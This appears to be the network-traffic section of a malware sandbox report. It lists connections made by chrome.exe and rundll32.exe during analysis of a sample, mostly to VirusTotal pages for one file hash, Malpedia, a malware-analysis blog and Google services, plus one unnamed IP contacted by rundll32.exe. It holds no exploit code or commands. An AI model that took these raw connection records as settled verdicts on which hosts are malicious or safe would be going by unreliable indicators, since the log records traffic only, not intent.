                                                                                                                                                                      HTTP Request

                                                                                                                                                                      GET https://www.virustotal.com/gui/8912.b2072d637490d0de7a85.js

                                                                                                                                                                      HTTP Request

                                                                                                                                                                      GET https://www.virustotal.com/gui/3638.c503caee30980cc9b284.js

                                                                                                                                                                      HTTP Request

                                                                                                                                                                      GET https://www.virustotal.com/gui/4123.14b566c1cb5c59b0718d.js

                                                                                                                                                                      HTTP Request

                                                                                                                                                                      GET https://www.virustotal.com/gui/3175.4f88c9f0852ec3c0344c.js

                                                                                                                                                                      HTTP Request

                                                                                                                                                                      GET https://www.virustotal.com/gui/3659.7349226393281cbfc478.js

                                                                                                                                                                      HTTP Request

                                                                                                                                                                      GET https://www.virustotal.com/gui/2366.1a85616a4e6e926a9fc7.js

                                                                                                                                                                      HTTP Request

                                                                                                                                                                      GET https://www.virustotal.com/gui/4940.790d8b5b48ed146de206.js

                                                                                                                                                                      HTTP Request

                                                                                                                                                                      GET https://www.virustotal.com/gui/3449.89868b14145e1d880721.js

                                                                                                                                                                      HTTP Request

                                                                                                                                                                      GET https://www.virustotal.com/gui/672.535889cc9667fec91198.js

                                                                                                                                                                      HTTP Request

                                                                                                                                                                      GET https://www.virustotal.com/gui/3855.9955e2e9c1622f3aa1de.js

                                                                                                                                                                      HTTP Request

                                                                                                                                                                      GET https://www.virustotal.com/gui/6842.d82ffeefb51cc24f374f.js

                                                                                                                                                                      HTTP Request

                                                                                                                                                                      GET https://www.virustotal.com/gui/410.690cf5d5695a51f566f6.js

                                                                                                                                                                      HTTP Request

                                                                                                                                                                      GET https://www.virustotal.com/gui/4509.41bab6b5b8e300ef03da.js

                                                                                                                                                                      HTTP Request

                                                                                                                                                                      GET https://www.virustotal.com/ui/files/9fe04c781e72a87b131df24fa7f16567fcfe4c16c8e812650e5d583c65e6e3ba

                                                                                                                                                                      HTTP Request

                                                                                                                                                                      POST https://www.virustotal.com/ui/files/9fe04c781e72a87b131df24fa7f16567fcfe4c16c8e812650e5d583c65e6e3ba/submissions/add

                                                                                                                                                                      HTTP Request

                                                                                                                                                                      GET https://www.virustotal.com/gui/icon.types-peexe.60b13774c01cc2f83b9d.js

                                                                                                                                                                      HTTP Request

                                                                                                                                                                      GET https://www.virustotal.com/ui/files/9fe04c781e72a87b131df24fa7f16567fcfe4c16c8e812650e5d583c65e6e3ba/dropped_files

                                                                                                                                                                      HTTP Request

                                                                                                                                                                      GET https://www.virustotal.com/ui/files/9fe04c781e72a87b131df24fa7f16567fcfe4c16c8e812650e5d583c65e6e3ba/contacted_urls

                                                                                                                                                                      HTTP Request

                                                                                                                                                                      GET https://www.virustotal.com/ui/files/9fe04c781e72a87b131df24fa7f16567fcfe4c16c8e812650e5d583c65e6e3ba/contacted_domains

                                                                                                                                                                      HTTP Request

                                                                                                                                                                      GET https://www.virustotal.com/ui/files/9fe04c781e72a87b131df24fa7f16567fcfe4c16c8e812650e5d583c65e6e3ba/contacted_ips

                                                                                                                                                                      HTTP Request

                                                                                                                                                                      GET https://www.virustotal.com/ui/files/9fe04c781e72a87b131df24fa7f16567fcfe4c16c8e812650e5d583c65e6e3ba/execution_parents

                                                                                                                                                                      HTTP Request

                                                                                                                                                                      GET https://www.virustotal.com/ui/files/9fe04c781e72a87b131df24fa7f16567fcfe4c16c8e812650e5d583c65e6e3ba/pe_resource_parents

                                                                                                                                                                      HTTP Request

                                                                                                                                                                      GET https://www.virustotal.com/ui/files/9fe04c781e72a87b131df24fa7f16567fcfe4c16c8e812650e5d583c65e6e3ba/bundled_files

                                                                                                                                                                      HTTP Request

                                                                                                                                                                      GET https://www.virustotal.com/ui/files/9fe04c781e72a87b131df24fa7f16567fcfe4c16c8e812650e5d583c65e6e3ba/pe_resource_children

                                                                                                                                                                      HTTP Request

                                                                                                                                                                      GET https://www.virustotal.com/ui/files/9fe04c781e72a87b131df24fa7f16567fcfe4c16c8e812650e5d583c65e6e3ba/behaviour_mitre_trees

                                                                                                                                                                      HTTP Request

                                                                                                                                                                      GET https://www.virustotal.com/ui/files/9fe04c781e72a87b131df24fa7f16567fcfe4c16c8e812650e5d583c65e6e3ba/behaviours?limit=40

                                                                                                                                                                      HTTP Request

                                                                                                                                                                      GET https://www.virustotal.com/ui/files/9fe04c781e72a87b131df24fa7f16567fcfe4c16c8e812650e5d583c65e6e3ba/votes?relationships=item%2Cvoter

                                                                                                                                                                      HTTP Request

                                                                                                                                                                      GET https://www.virustotal.com/ui/files/9fe04c781e72a87b131df24fa7f16567fcfe4c16c8e812650e5d583c65e6e3ba/comments?relationships=item%2Cauthor

                                                                                                                                                                      HTTP Request

                                                                                                                                                                      GET https://www.virustotal.com/ui/files/9fe04c781e72a87b131df24fa7f16567fcfe4c16c8e812650e5d583c65e6e3ba/references?limit=10

                                                                                                                                                                      HTTP Request

                                                                                                                                                                      GET https://www.virustotal.com/ui/files/9fe04c781e72a87b131df24fa7f16567fcfe4c16c8e812650e5d583c65e6e3ba/related_references?limit=10

                                                                                                                                                                      HTTP Request

                                                                                                                                                                      GET https://www.virustotal.com/ui/files/9fe04c781e72a87b131df24fa7f16567fcfe4c16c8e812650e5d583c65e6e3ba/graphs?relationships=owner%2Cviewers%2Ceditors
                                                                                                                                                                    • 142.250.179.163:443
                                                                                                                                                                      https://www.recaptcha.net/recaptcha/api.js?render=explicit
                                                                                                                                                                      tls, http2
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      1.9kB
                                                                                                                                                                      14.1kB
                                                                                                                                                                      19
                                                                                                                                                                      22

                                                                                                                                                                      HTTP Request

                                                                                                                                                                      GET https://www.recaptcha.net/recaptcha/api.js?render=explicit
                                                                                                                                                                    • 161.131.163.1:443
                                                                                                                                                                      rundll32.exe
                                                                                                                                                                      208 B
                                                                                                                                                                      4
                                                                                                                                                                    • 74.125.34.46:443
                                                                                                                                                                      https://www.virustotal.com/gui/manifest.json
                                                                                                                                                                      tls, http2
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      1.7kB
                                                                                                                                                                      5.0kB
                                                                                                                                                                      15
                                                                                                                                                                      16

                                                                                                                                                                      HTTP Request

                                                                                                                                                                      GET https://www.virustotal.com/gui/manifest.json
                                                                                                                                                                    • 127.0.0.1:15567
                                                                                                                                                                      LocalService
                                                                                                                                                                    • 74.125.34.46:443
                                                                                                                                                                      www.virustotal.com
                                                                                                                                                                      tls
                                                                                                                                                                      rundll32.exe
                                                                                                                                                                      14.6kB
                                                                                                                                                                      51.2kB
                                                                                                                                                                      54
                                                                                                                                                                      88
                                                                                                                                                                    • 127.0.0.1:15567
                                                                                                                                                                      rundll32.exe
                                                                                                                                                                    • 127.0.0.1:15567
                                                                                                                                                                      LocalService
                                                                                                                                                                    • 142.251.36.14:443
                                                                                                                                                                      encrypted-tbn0.gstatic.com
                                                                                                                                                                      tls
                                                                                                                                                                      rundll32.exe
                                                                                                                                                                      1.3kB
                                                                                                                                                                      7.8kB
                                                                                                                                                                      11
                                                                                                                                                                      11
                                                                                                                                                                    • 142.251.36.1:443
                                                                                                                                                                      lh5.googleusercontent.com
                                                                                                                                                                      tls
                                                                                                                                                                      rundll32.exe
                                                                                                                                                                      1.4kB
                                                                                                                                                                      16.6kB
                                                                                                                                                                      13
                                                                                                                                                                      17
                                                                                                                                                                    • 142.251.36.14:443
                                                                                                                                                                      encrypted-tbn0.gstatic.com
                                                                                                                                                                      tls
                                                                                                                                                                      rundll32.exe
                                                                                                                                                                      1.3kB
                                                                                                                                                                      7.1kB
                                                                                                                                                                      10
                                                                                                                                                                      10
                                                                                                                                                                    • 142.251.36.14:443
                                                                                                                                                                      encrypted-tbn0.gstatic.com
                                                                                                                                                                      tls
                                                                                                                                                                      rundll32.exe
                                                                                                                                                                      1.3kB
                                                                                                                                                                      7.1kB
                                                                                                                                                                      10
                                                                                                                                                                      10
                                                                                                                                                                    • 142.251.36.14:443
                                                                                                                                                                      encrypted-tbn0.gstatic.com
                                                                                                                                                                      tls
                                                                                                                                                                      rundll32.exe
                                                                                                                                                                      1.3kB
                                                                                                                                                                      6.9kB
                                                                                                                                                                      10
                                                                                                                                                                      10
                                                                                                                                                                    • 127.0.0.1:15567
                                                                                                                                                                      LocalService
                                                                                                                                                                    • 127.0.0.1:15567
                                                                                                                                                                      LocalService
                                                                                                                                                                    • 127.0.0.1:15567
                                                                                                                                                                      LocalService
                                                                                                                                                                    • 127.0.0.1:15568
                                                                                                                                                                      chrome.exe
                                                                                                                                                                    • 127.0.0.1:15568
                                                                                                                                                                      chrome.exe
                                                                                                                                                                    • 127.0.0.1:15567
                                                                                                                                                                      LocalService
                                                                                                                                                                    • 127.0.0.1:15567
                                                                                                                                                                      LocalService
                                                                                                                                                                    • 142.251.36.3:443
                                                                                                                                                                      id.google.com
                                                                                                                                                                      tls
                                                                                                                                                                      rundll32.exe
                                                                                                                                                                      1.7kB
                                                                                                                                                                      8.6kB
                                                                                                                                                                      10
                                                                                                                                                                      11
                                                                                                                                                                    • 142.251.39.118:443
                                                                                                                                                                      i.ytimg.com
                                                                                                                                                                      tls
                                                                                                                                                                      rundll32.exe
                                                                                                                                                                      1.5kB
                                                                                                                                                                      9.2kB
                                                                                                                                                                      11
                                                                                                                                                                      12
                                                                                                                                                                    • 142.251.36.14:443
                                                                                                                                                                      play.google.com
                                                                                                                                                                      tls
                                                                                                                                                                      rundll32.exe
                                                                                                                                                                      2.1kB
                                                                                                                                                                      8.2kB
                                                                                                                                                                      9
                                                                                                                                                                      11
                                                                                                                                                                    • 127.0.0.1:15567
                                                                                                                                                                      LocalService
                                                                                                                                                                    • 127.0.0.1:15568
                                                                                                                                                                      chrome.exe
                                                                                                                                                                    • 127.0.0.1:15568
                                                                                                                                                                      chrome.exe
                                                                                                                                                                    • 127.0.0.1:15568
                                                                                                                                                                      chrome.exe
                                                                                                                                                                    • 127.0.0.1:15568
                                                                                                                                                                      chrome.exe
                                                                                                                                                                    • 127.0.0.1:15568
                                                                                                                                                                      chrome.exe
                                                                                                                                                                    • 127.0.0.1:15568
                                                                                                                                                                      chrome.exe
                                                                                                                                                                    • 127.0.0.1:15568
                                                                                                                                                                      chrome.exe
                                                                                                                                                                    • 127.0.0.1:15568
                                                                                                                                                                      chrome.exe
                                                                                                                                                                    • 127.0.0.1:15568
                                                                                                                                                                      chrome.exe
                                                                                                                                                                    • 127.0.0.1:15568
                                                                                                                                                                      chrome.exe
                                                                                                                                                                    • 127.0.0.1:15568
                                                                                                                                                                      chrome.exe
                                                                                                                                                                    • 127.0.0.1:15568
                                                                                                                                                                      chrome.exe
                                                                                                                                                                    • 127.0.0.1:15568
                                                                                                                                                                      chrome.exe
                                                                                                                                                                    • 127.0.0.1:15568
                                                                                                                                                                      chrome.exe
                                                                                                                                                                    • 127.0.0.1:15568
                                                                                                                                                                      chrome.exe
                                                                                                                                                                    • 127.0.0.1:15568
                                                                                                                                                                      chrome.exe
                                                                                                                                                                    • 127.0.0.1:15568
                                                                                                                                                                      chrome.exe
                                                                                                                                                                    • 127.0.0.1:15567
                                                                                                                                                                      LocalService
                                                                                                                                                                    • 127.0.0.1:15568
                                                                                                                                                                      chrome.exe
                                                                                                                                                                    • 127.0.0.1:15568
                                                                                                                                                                      chrome.exe
                                                                                                                                                                    • 127.0.0.1:15568
                                                                                                                                                                      chrome.exe
                                                                                                                                                                    • 127.0.0.1:15568
                                                                                                                                                                      chrome.exe
                                                                                                                                                                    • 127.0.0.1:15568
                                                                                                                                                                      chrome.exe
                                                                                                                                                                    • 127.0.0.1:15568
                                                                                                                                                                      chrome.exe
                                                                                                                                                                    • 129.233.182.56:443
                                                                                                                                                                      malpedia.caad.fkie.fraunhofer.de
                                                                                                                                                                      tls
                                                                                                                                                                      rundll32.exe
                                                                                                                                                                      8.8kB
                                                                                                                                                                      280.6kB
                                                                                                                                                                      116
                                                                                                                                                                      215
                                                                                                                                                                    • 129.233.182.56:443
                                                                                                                                                                      malpedia.caad.fkie.fraunhofer.de
                                                                                                                                                                      tls
                                                                                                                                                                      rundll32.exe
                                                                                                                                                                      19.9kB
                                                                                                                                                                      902.1kB
                                                                                                                                                                      355
                                                                                                                                                                      665
                                                                                                                                                                    • 127.0.0.1:15568
                                                                                                                                                                      chrome.exe
                                                                                                                                                                    • 127.0.0.1:15568
                                                                                                                                                                      chrome.exe
                                                                                                                                                                    • 127.0.0.1:15568
                                                                                                                                                                      chrome.exe
                                                                                                                                                                    • 142.250.179.162:443
                                                                                                                                                                      googleads.g.doubleclick.net
                                                                                                                                                                      tls
                                                                                                                                                                      rundll32.exe
                                                                                                                                                                      2.0kB
                                                                                                                                                                      7.3kB
                                                                                                                                                                      11
                                                                                                                                                                      11
                                                                                                                                                                    • 142.251.36.6:443
                                                                                                                                                                      static.doubleclick.net
                                                                                                                                                                      tls
                                                                                                                                                                      rundll32.exe
                                                                                                                                                                      1.3kB
                                                                                                                                                                      6.0kB
                                                                                                                                                                      9
                                                                                                                                                                      8
                                                                                                                                                                    • 142.250.179.170:443
                                                                                                                                                                      jnn-pa.googleapis.com
                                                                                                                                                                      tls
                                                                                                                                                                      rundll32.exe
                                                                                                                                                                      5.3kB
                                                                                                                                                                      41.4kB
                                                                                                                                                                      26
                                                                                                                                                                      41
                                                                                                                                                                    • 127.0.0.1:15568
                                                                                                                                                                      chrome.exe
                                                                                                                                                                    • 127.0.0.1:15568
                                                                                                                                                                      chrome.exe
                                                                                                                                                                    • 129.233.182.56:443
                                                                                                                                                                      malpedia.caad.fkie.fraunhofer.de
                                                                                                                                                                      tls
                                                                                                                                                                      rundll32.exe
                                                                                                                                                                      7.5kB
                                                                                                                                                                      121.8kB
                                                                                                                                                                      58
                                                                                                                                                                      98
                                                                                                                                                                    • 129.233.182.56:443
                                                                                                                                                                      malpedia.caad.fkie.fraunhofer.de
                                                                                                                                                                      tls
                                                                                                                                                                      rundll32.exe
                                                                                                                                                                      2.6kB
                                                                                                                                                                      34.4kB
                                                                                                                                                                      22
                                                                                                                                                                      32
                                                                                                                                                                    • 129.233.182.56:443
                                                                                                                                                                      malpedia.caad.fkie.fraunhofer.de
                                                                                                                                                                      tls
                                                                                                                                                                      rundll32.exe
                                                                                                                                                                      4.6kB
                                                                                                                                                                      75.6kB
                                                                                                                                                                      38
                                                                                                                                                                      64
                                                                                                                                                                    • 129.233.182.56:443
                                                                                                                                                                      malpedia.caad.fkie.fraunhofer.de
                                                                                                                                                                      tls
                                                                                                                                                                      rundll32.exe
                                                                                                                                                                      2.5kB
                                                                                                                                                                      64.3kB
                                                                                                                                                                      32
                                                                                                                                                                      53
                                                                                                                                                                    • 127.0.0.1:15568
                                                                                                                                                                      chrome.exe
                                                                                                                                                                    • 127.0.0.1:15568
                                                                                                                                                                      chrome.exe
                                                                                                                                                                    • 127.0.0.1:15568
                                                                                                                                                                      chrome.exe
                                                                                                                                                                    • 127.0.0.1:15568
                                                                                                                                                                      chrome.exe
                                                                                                                                                                    • 127.0.0.1:15568
                                                                                                                                                                      chrome.exe
                                                                                                                                                                    • 127.0.0.1:15568
                                                                                                                                                                      chrome.exe
                                                                                                                                                                    • 127.0.0.1:15568
                                                                                                                                                                      chrome.exe
                                                                                                                                                                    • 127.0.0.1:15568
                                                                                                                                                                      chrome.exe
                                                                                                                                                                    • 127.0.0.1:15568
                                                                                                                                                                      chrome.exe
                                                                                                                                                                    • 127.0.0.1:15568
                                                                                                                                                                      chrome.exe
                                                                                                                                                                    • 127.0.0.1:15567
                                                                                                                                                                      LocalService
                                                                                                                                                                    • 74.125.34.46:443
                                                                                                                                                                      www.virustotal.com
                                                                                                                                                                      tls
                                                                                                                                                                      rundll32.exe
                                                                                                                                                                      2.7kB
                                                                                                                                                                      22.2kB
                                                                                                                                                                      16
                                                                                                                                                                      25
                                                                                                                                                                    • 74.125.34.46:443
                                                                                                                                                                      www.virustotal.com
                                                                                                                                                                      tls
                                                                                                                                                                      rundll32.exe
                                                                                                                                                                      4.3kB
                                                                                                                                                                      7.8kB
                                                                                                                                                                      14
                                                                                                                                                                      18
                                                                                                                                                                    • 74.125.34.46:443
                                                                                                                                                                      www.virustotal.com
                                                                                                                                                                      tls
                                                                                                                                                                      rundll32.exe
                                                                                                                                                                      1.8kB
                                                                                                                                                                      14.2kB
                                                                                                                                                                      13
                                                                                                                                                                      19
                                                                                                                                                                    • 74.125.34.46:443
                                                                                                                                                                      www.virustotal.com
                                                                                                                                                                      tls
                                                                                                                                                                      rundll32.exe
                                                                                                                                                                      2.9kB
                                                                                                                                                                      23.8kB
                                                                                                                                                                      19
                                                                                                                                                                      31
                                                                                                                                                                    • 74.125.34.46:443
                                                                                                                                                                      www.virustotal.com
                                                                                                                                                                      tls
                                                                                                                                                                      rundll32.exe
                                                                                                                                                                      33.9kB
                                                                                                                                                                      404.7kB
                                                                                                                                                                      224
                                                                                                                                                                      416
                                                                                                                                                                    • 142.251.36.42:443
                                                                                                                                                                      content-autofill.googleapis.com
                                                                                                                                                                      tls
                                                                                                                                                                      rundll32.exe
                                                                                                                                                                      2.4kB
                                                                                                                                                                      6.9kB
                                                                                                                                                                      12
                                                                                                                                                                      12
                                                                                                                                                                    • 127.0.0.1:15568
                                                                                                                                                                      chrome.exe
                                                                                                                                                                    • 127.0.0.1:15568
                                                                                                                                                                      chrome.exe
                                                                                                                                                                    • 127.0.0.1:15568
                                                                                                                                                                      chrome.exe
                                                                                                                                                                    • 127.0.0.1:15568
                                                                                                                                                                      chrome.exe
                                                                                                                                                                    • 127.0.0.1:15568
                                                                                                                                                                      chrome.exe
                                                                                                                                                                    • 127.0.0.1:15568
                                                                                                                                                                      chrome.exe
                                                                                                                                                                    • 127.0.0.1:15568
                                                                                                                                                                      chrome.exe
                                                                                                                                                                    • 104.18.33.245:443
                                                                                                                                                                      malwarology.substack.com
                                                                                                                                                                      tls
                                                                                                                                                                      rundll32.exe
                                                                                                                                                                      3.7kB
                                                                                                                                                                      50.9kB
                                                                                                                                                                      32
                                                                                                                                                                      52
                                                                                                                                                                    • 104.18.33.245:443
                                                                                                                                                                      malwarology.substack.com
                                                                                                                                                                      tls
                                                                                                                                                                      rundll32.exe
                                                                                                                                                                      2.2kB
                                                                                                                                                                      4.2kB
                                                                                                                                                                      9
                                                                                                                                                                      7
                                                                                                                                                                    • 65.9.86.11:443
                                                                                                                                                                      substackcdn.com
                                                                                                                                                                      tls
                                                                                                                                                                      rundll32.exe
                                                                                                                                                                      4.4kB
                                                                                                                                                                      79.6kB
                                                                                                                                                                      60
                                                                                                                                                                      63
                                                                                                                                                                    • 65.9.86.11:443
                                                                                                                                                                      substackcdn.com
                                                                                                                                                                      tls
                                                                                                                                                                      rundll32.exe
                                                                                                                                                                      1.6kB
                                                                                                                                                                      29.2kB
                                                                                                                                                                      17
                                                                                                                                                                      26
                                                                                                                                                                    • 65.9.86.11:443
                                                                                                                                                                      substackcdn.com
                                                                                                                                                                      tls
                                                                                                                                                                      rundll32.exe
                                                                                                                                                                      20.1kB
                                                                                                                                                                      898.6kB
                                                                                                                                                                      344
                                                                                                                                                                      672
                                                                                                                                                                    • 65.9.86.11:443
                                                                                                                                                                      substackcdn.com
                                                                                                                                                                      tls
                                                                                                                                                                      rundll32.exe
                                                                                                                                                                      2.5kB
                                                                                                                                                                      22.1kB
                                                                                                                                                                      16
                                                                                                                                                                      23
                                                                                                                                                                    • 65.9.86.11:443
                                                                                                                                                                      substackcdn.com
                                                                                                                                                                      tls
                                                                                                                                                                      rundll32.exe
                                                                                                                                                                      5.0kB
                                                                                                                                                                      77.0kB
                                                                                                                                                                      39
                                                                                                                                                                      64
                                                                                                                                                                    • 151.101.66.217:443
                                                                                                                                                                      js.sentry-cdn.com
                                                                                                                                                                      tls
                                                                                                                                                                      rundll32.exe
                                                                                                                                                                      1.3kB
                                                                                                                                                                      5.8kB
                                                                                                                                                                      10
                                                                                                                                                                      13
                                                                                                                                                                    • 127.0.0.1:15568
                                                                                                                                                                      chrome.exe
                                                                                                                                                                    • 127.0.0.1:15568
                                                                                                                                                                      chrome.exe
                                                                                                                                                                    • 127.0.0.1:15568
                                                                                                                                                                      chrome.exe
                                                                                                                                                                    • 127.0.0.1:15568
                                                                                                                                                                      chrome.exe
                                                                                                                                                                    • 127.0.0.1:15568
                                                                                                                                                                      chrome.exe
                                                                                                                                                                    • 127.0.0.1:15568
                                                                                                                                                                      chrome.exe
                                                                                                                                                                    • 127.0.0.1:15567
                                                                                                                                                                      LocalService
                                                                                                                                                                    • 127.0.0.1:15568
                                                                                                                                                                      chrome.exe
                                                                                                                                                                    • 127.0.0.1:15568
                                                                                                                                                                      chrome.exe
                                                                                                                                                                    • 104.18.33.245:443
                                                                                                                                                                      malwarology.substack.com
                                                                                                                                                                      tls
                                                                                                                                                                      rundll32.exe
                                                                                                                                                                      1.5kB
                                                                                                                                                                      4.2kB
                                                                                                                                                                      8
                                                                                                                                                                      7
                                                                                                                                                                    • 104.18.33.245:443
                                                                                                                                                                      malwarology.substack.com
                                                                                                                                                                      tls
                                                                                                                                                                      rundll32.exe
                                                                                                                                                                      4.8kB
                                                                                                                                                                      7.8kB
                                                                                                                                                                      15
                                                                                                                                                                      15
                                                                                                                                                                    • 104.18.33.245:443
                                                                                                                                                                      malwarology.substack.com
                                                                                                                                                                      tls
                                                                                                                                                                      rundll32.exe
                                                                                                                                                                      2.0kB
                                                                                                                                                                      4.2kB
                                                                                                                                                                      8
                                                                                                                                                                      7
                                                                                                                                                                    • 142.251.36.42:443
                                                                                                                                                                      content-autofill.googleapis.com
                                                                                                                                                                      tls
                                                                                                                                                                      rundll32.exe
                                                                                                                                                                      1.5kB
                                                                                                                                                                      6.0kB
                                                                                                                                                                      10
                                                                                                                                                                      10
                                                                                                                                                                    • 52.217.44.212:443
                                                                                                                                                                      bucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com
                                                                                                                                                                      tls
                                                                                                                                                                      rundll32.exe
                                                                                                                                                                      2.2kB
                                                                                                                                                                      41.2kB
                                                                                                                                                                      26
                                                                                                                                                                      42
                                                                                                                                                                    • 142.251.36.42:443
                                                                                                                                                                      content-autofill.googleapis.com
                                                                                                                                                                      tls
                                                                                                                                                                      rundll32.exe
                                                                                                                                                                      1.4kB
                                                                                                                                                                      5.9kB
                                                                                                                                                                      10
                                                                                                                                                                      10
                                                                                                                                                                    • 142.250.179.162:443
                                                                                                                                                                      googleads.g.doubleclick.net
                                                                                                                                                                      tls
                                                                                                                                                                      rundll32.exe
                                                                                                                                                                      1.7kB
                                                                                                                                                                      7.3kB
                                                                                                                                                                      10
                                                                                                                                                                      11
                                                                                                                                                                    • 34.104.35.123:80
                                                                                                                                                                      http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFUTGhWQUViMUVlUQ/0.57.44.2492_hnimpnehoodheedghdeeijklkeaacbdc.crx
                                                                                                                                                                      http
                                                                                                                                                                      113.2kB
                                                                                                                                                                      6.4MB
                                                                                                                                                                      2400
                                                                                                                                                                      4604

                                                                                                                                                                      HTTP Request

                                                                                                                                                                      GET http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFUTGhWQUViMUVlUQ/0.57.44.2492_hnimpnehoodheedghdeeijklkeaacbdc.crx

                                                                                                                                                                      HTTP Response

                                                                                                                                                                      206

                                                                                                                                                                      HTTP Request

                                                                                                                                                                      GET http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFUTGhWQUViMUVlUQ/0.57.44.2492_hnimpnehoodheedghdeeijklkeaacbdc.crx

                                                                                                                                                                      HTTP Response

                                                                                                                                                                      206

                                                                                                                                                                      HTTP Request

                                                                                                                                                                      GET http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFUTGhWQUViMUVlUQ/0.57.44.2492_hnimpnehoodheedghdeeijklkeaacbdc.crx

                                                                                                                                                                      HTTP Response

                                                                                                                                                                      206

                                                                                                                                                                      HTTP Request

                                                                                                                                                                      GET http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFUTGhWQUViMUVlUQ/0.57.44.2492_hnimpnehoodheedghdeeijklkeaacbdc.crx

                                                                                                                                                                      HTTP Response

                                                                                                                                                                      206

                                                                                                                                                                      HTTP Request

                                                                                                                                                                      GET http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFUTGhWQUViMUVlUQ/0.57.44.2492_hnimpnehoodheedghdeeijklkeaacbdc.crx

                                                                                                                                                                      HTTP Response

                                                                                                                                                                      206
                                                                                                                                                                    • 127.0.0.1:15568
                                                                                                                                                                      chrome.exe
                                                                                                                                                                    • 127.0.0.1:15568
                                                                                                                                                                      chrome.exe
                                                                                                                                                                    • 127.0.0.1:15568
                                                                                                                                                                      chrome.exe
                                                                                                                                                                    • 127.0.0.1:15568
                                                                                                                                                                      chrome.exe
                                                                                                                                                                    • 127.0.0.1:15568
                                                                                                                                                                      chrome.exe
                                                                                                                                                                    • 127.0.0.1:15568
                                                                                                                                                                      chrome.exe
                                                                                                                                                                    • 127.0.0.1:15568
                                                                                                                                                                      chrome.exe
                                                                                                                                                                    • 127.0.0.1:15568
                                                                                                                                                                      chrome.exe
                                                                                                                                                                    • 127.0.0.1:15568
                                                                                                                                                                      chrome.exe
                                                                                                                                                                    • 127.0.0.1:15568
                                                                                                                                                                      chrome.exe
                                                                                                                                                                    • 127.0.0.1:15568
                                                                                                                                                                      chrome.exe
                                                                                                                                                                    • 127.0.0.1:15567
                                                                                                                                                                      LocalService
                                                                                                                                                                    • 142.250.179.163:443
                                                                                                                                                                      update.googleapis.com
                                                                                                                                                                      tls
                                                                                                                                                                      rundll32.exe
                                                                                                                                                                      2.3kB
                                                                                                                                                                      6.7kB
                                                                                                                                                                      11
                                                                                                                                                                      11
                                                                                                                                                                    • 129.233.182.56:443
                                                                                                                                                                      malpedia.caad.fkie.fraunhofer.de
                                                                                                                                                                      tls
                                                                                                                                                                      rundll32.exe
                                                                                                                                                                      2.0kB
                                                                                                                                                                      29.7kB
                                                                                                                                                                      18
                                                                                                                                                                      28
                                                                                                                                                                    • 129.233.182.56:443
                                                                                                                                                                      malpedia.caad.fkie.fraunhofer.de
                                                                                                                                                                      tls
                                                                                                                                                                      rundll32.exe
                                                                                                                                                                      856 B
                                                                                                                                                                      7.5kB
                                                                                                                                                                      10
                                                                                                                                                                      11
                                                                                                                                                                    • 127.0.0.1:15568
                                                                                                                                                                      chrome.exe
                                                                                                                                                                    • 127.0.0.1:15568
                                                                                                                                                                      chrome.exe
                                                                                                                                                                    • 127.0.0.1:15568
                                                                                                                                                                      chrome.exe
                                                                                                                                                                    • 127.0.0.1:15568
                                                                                                                                                                      chrome.exe
                                                                                                                                                                    • 127.0.0.1:15567
                                                                                                                                                                      LocalService
                                                                                                                                                                    • 216.58.208.99:443
                                                                                                                                                                      beacons.gcp.gvt2.com
                                                                                                                                                                      tls
                                                                                                                                                                      rundll32.exe
                                                                                                                                                                      2.3kB
                                                                                                                                                                      7.6kB
                                                                                                                                                                      11
                                                                                                                                                                      11
                                                                                                                                                                    • 142.251.36.42:443
                                                                                                                                                                      content-autofill.googleapis.com
                                                                                                                                                                      tls
                                                                                                                                                                      rundll32.exe
                                                                                                                                                                      2.1kB
                                                                                                                                                                      6.6kB
                                                                                                                                                                      11
                                                                                                                                                                      11
                                                                                                                                                                    • 216.58.208.99:443
                                                                                                                                                                      beacons.gcp.gvt2.com
                                                                                                                                                                      tls
                                                                                                                                                                      rundll32.exe
                                                                                                                                                                      7.2kB
                                                                                                                                                                      8.9kB
                                                                                                                                                                      16
                                                                                                                                                                      12
                                                                                                                                                                    • 127.0.0.1:15568
                                                                                                                                                                      chrome.exe
                                                                                                                                                                    • 127.0.0.1:15568
                                                                                                                                                                      chrome.exe
                                                                                                                                                                    • 127.0.0.1:15568
                                                                                                                                                                      chrome.exe
                                                                                                                                                                    • 127.0.0.1:15567
                                                                                                                                                                      LocalService
                                                                                                                                                                    • 127.0.0.1:15567
                                                                                                                                                                      LocalService
                                                                                                                                                                    • 8.8.4.4:443
                                                                                                                                                                      https://dns.google/dns-query?dns=AAABAAABAAAAAAABA3d3dwdnc3RhdGljA2NvbQAAAQABAAApEAAAAAAAAFQADABQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                      tls, http2
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      1.6kB
                                                                                                                                                                      7.0kB
                                                                                                                                                                      14
                                                                                                                                                                      14

                                                                                                                                                                      HTTP Request

                                                                                                                                                                      GET https://dns.google/dns-query?dns=AAABAAABAAAAAAABA3d3dwdnc3RhdGljA2NvbQAAAQABAAApEAAAAAAAAFQADABQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                    • 127.0.0.1:15567
                                                                                                                                                                      LocalService
                                                                                                                                                                    • 127.0.0.1:15568
                                                                                                                                                                      chrome.exe
                                                                                                                                                                    • 127.0.0.1:15568
                                                                                                                                                                      chrome.exe
                                                                                                                                                                    • 127.0.0.1:15568
